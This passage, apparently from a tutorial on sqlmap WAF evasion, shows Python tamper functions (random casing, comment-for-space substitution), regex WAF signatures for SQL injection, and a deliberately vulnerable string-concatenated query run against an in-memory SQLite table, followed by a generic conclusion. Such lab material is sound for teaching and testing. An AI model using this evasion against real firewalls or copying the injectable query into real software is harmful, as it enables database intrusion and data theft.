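    return re.sub(r"[A-Za-z]+", flip, payload)


def tamper(payload: str, **kwargs) -> str:
    """Entry point sqlmap invokes for every payload before sending it."""
    return randomcase(space2comment(payload), kwargs.get("rng"))


# A deliberately naive, regex-based filter standing in for a WAF rule set.
SIGNATURES = [
    re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    re.compile(r"\bor\s+1\s*=\s*1\b", re.IGNORECASE),
    re.compile(r"'\s*or\s*'", re.IGNORECASE),
]


def blocked(payload: str) -> bool:
    return any(sig.search(payload) for sig in SIGNATURES)


def run_injected(payload: str) -> List[str]:
    """Run the payload through the vulnerable query to prove it still parses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 's3cr3t')")  # constructed row
    rows = conn.execute("SELECT name FROM users WHERE id = " + payload).fetchall()
    return sorted(r[0] for r in rows)
```

Two things the check makes visible: randomcase on its own does nothing against a case-insensitive rule (the filter still matches), while space2comment defeats a rule that relies on whitespace between keywords; and the rewritten payload returns the same rows as the original, which is the property every tamper script must keep.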

Conclusion

In conclusion, SQLmap evasion techniques can be incredibly useful for security professionals looking to bypass web application firewalls and other security measures in order to successfully exploit SQL injection vulnerabilities. By using a combination of techniques and customizing them to fit specific needs, security professionals can stay ahead of attackers and better protect their web applications from potential SQL injection attacks. However, it’s important to remember to test in a safe environment, keep up-to-date with the latest techniques, and use caution and ethical considerations when using SQLmap and its evasion techniques. Overall, by understanding and using SQLmap evasion techniques effectively, security professionals can better defend against SQL injection attacks and ensure the security and integrity of their web applications.
